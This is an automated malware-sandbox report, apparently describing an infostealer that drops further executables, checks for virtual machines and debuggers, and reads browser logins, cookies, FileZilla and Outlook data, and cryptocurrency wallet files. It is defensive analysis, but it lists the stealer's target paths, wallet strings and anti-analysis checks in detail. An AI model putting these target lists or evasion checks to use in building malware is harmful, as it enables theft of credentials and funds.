Source: RoamingBKJEGDGIJE.exe, RoamingBKJEGDGIJE.exe, 00000006.00000002.2373687133.000000000049A000.00000040.00000001.01000000.00000009.sdmp, RoamingIJEGDBGDBF.exe, RoamingIJEGDBGDBF.exe, 00000009.00000002.2452147318.0000000000251000.00000040.00000001.01000000.0000000A.sdmp, explorti.exe, explorti.exe, 0000000E.00000002.2491799529.0000000000DF1000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 0000000F.00000002.2492757174.0000000000DF1000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000013.00000002.2766986693.0000000000A1A000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: EBFBKFBG.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: EBFBKFBG.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: EBFBKFBG.0.dr Binary or memory string: discord.comVMware20,11696487552f
Source: RoamingIJEGDBGDBF.exe, 00000009.00000003.2411611775.00000000012DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
Source: EBFBKFBG.0.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
Source: file.exe, 00000000.00000002.2400447542.00000000024DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwared};d
Source: EBFBKFBG.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: Amcache.hve.13.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: file.exe, 00000000.00000002.2400608729.0000000002507000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2400608729.0000000002571000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000012.00000003.3042588900.000000000126A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000012.00000003.3042588900.000000000126F000.00000004.00000020.00020000.00000000.sdmp, 7ca32398cd.exe, 00000014.00000002.2836612791.0000000002698000.00000004.00000020.00020000.00000000.sdmp, 7ca32398cd.exe, 00000014.00000002.2836612791.00000000026EE000.00000004.00000020.00020000.00000000.sdmp, 7ca32398cd.exe, 00000025.00000002.3000379607.000000000260C000.00000004.00000020.00020000.00000000.sdmp, 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: EBFBKFBG.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: EBFBKFBG.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: EBFBKFBG.0.dr Binary or memory string: global block list test formVMware20,11696487552
Source: EBFBKFBG.0.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: EBFBKFBG.0.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: EBFBKFBG.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: EBFBKFBG.0.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: EBFBKFBG.0.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: file.exe, 00000000.00000002.2433974980.000000002ED60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}5-
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: EBFBKFBG.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: EBFBKFBG.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: RoamingIJEGDBGDBF.exe, 00000009.00000003.2419740523.00000000012C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: EBFBKFBG.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: EBFBKFBG.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: EBFBKFBG.0.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: EBFBKFBG.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: EBFBKFBG.0.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: EBFBKFBG.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
Source: EBFBKFBG.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: EBFBKFBG.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: RoamingBKJEGDGIJE.exe, 00000006.00000002.2373687133.000000000049A000.00000040.00000001.01000000.00000009.sdmp, RoamingIJEGDBGDBF.exe, 00000009.00000002.2452147318.0000000000251000.00000040.00000001.01000000.0000000A.sdmp, explorti.exe, 0000000E.00000002.2491799529.0000000000DF1000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 0000000F.00000002.2492757174.0000000000DF1000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000013.00000002.2766986693.0000000000A1A000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 7ca32398cd.exe, 00000014.00000002.2836612791.00000000026D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW9"
Source: 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareN
Source: EBFBKFBG.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Code function: 6_2_04A906A8 rdtsc 6_2_04A906A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041ACFA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404610 VirtualProtect ?,00000004,00000100,00000000 0_2_00404610
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00419160 mov eax, dword ptr fs:[00000030h] 0_2_00419160
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle, 0_2_00405000
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041C8D9 SetUnhandledExceptionFilter, 0_2_0041C8D9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041A718
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB6B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6CB6B66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB6B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CB6B1F7
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: file.exe PID: 2036, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7ca32398cd.exe PID: 8012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7ca32398cd.exe PID: 1336, type: MEMORYSTR
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonly
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_004190A0
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingBKJEGDGIJE.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJEGDBGDBF.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe "C:\Users\user\AppData\RoamingBKJEGDGIJE.exe"
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe "C:\Users\user\AppData\RoamingIJEGDBGDBF.exe"
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe "C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\1000003002\5aa32fec17.exe "C:\Users\user\1000003002\5aa32fec17.exe"
Source: C:\Users\user\1000003002\5aa32fec17.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5175.tmp\5176.tmp\5177.bat C:\Users\user\1000003002\5aa32fec17.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: RoamingBKJEGDGIJE.exe, RoamingBKJEGDGIJE.exe, 00000006.00000002.2373687133.000000000049A000.00000040.00000001.01000000.00000009.sdmp, RoamingIJEGDBGDBF.exe, RoamingIJEGDBGDBF.exe, 00000009.00000002.2452147318.0000000000251000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00417630
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\1000003002\5aa32fec17.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00417420 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA, 0_2_00417420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_004172F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 0_2_004174D0

Stealing of Sensitive Information

Source: Yara match File source: 6.2.RoamingBKJEGDGIJE.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.explorti.exe.c00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.explorti.exe.c00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.axplong.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RoamingIJEGDBGDBF.exe.60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.2766827363.0000000000821000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2365017616.0000000005120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2373501686.00000000002A1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2451973039.0000000000061000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2379252513.0000000004F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2737331224.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2451358988.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2726323030.0000000005130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2491687101.0000000000C01000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2450117258.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2492594050.0000000000C01000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2332541426.0000000004880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2400608729.0000000002507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2836612791.0000000002698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.3000379607.00000000025BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2036, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7ca32398cd.exe PID: 8012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7ca32398cd.exe PID: 1336, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: \jaxx\Local Storage\
Source: file.exe String found in binary or memory: passphrase.json
Source: file.exe String found in binary or memory: \Ethereum\
Source: file.exe, 00000000.00000002.2400608729.0000000002571000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 16.113Users\user\AppData\Roaming\Binance\.finger-print.fpk
Source: file.exe String found in binary or memory: Ethereum
Source: file.exe String found in binary or memory: file__0.localstorage
Source: file.exe String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe String found in binary or memory: ltiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.js
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: Yara match File source: Process Memory Space: file.exe PID: 2036, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000000.00000002.2400608729.0000000002507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2836612791.0000000002698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.3000379607.00000000025BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2036, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7ca32398cd.exe PID: 8012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7ca32398cd.exe PID: 1336, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP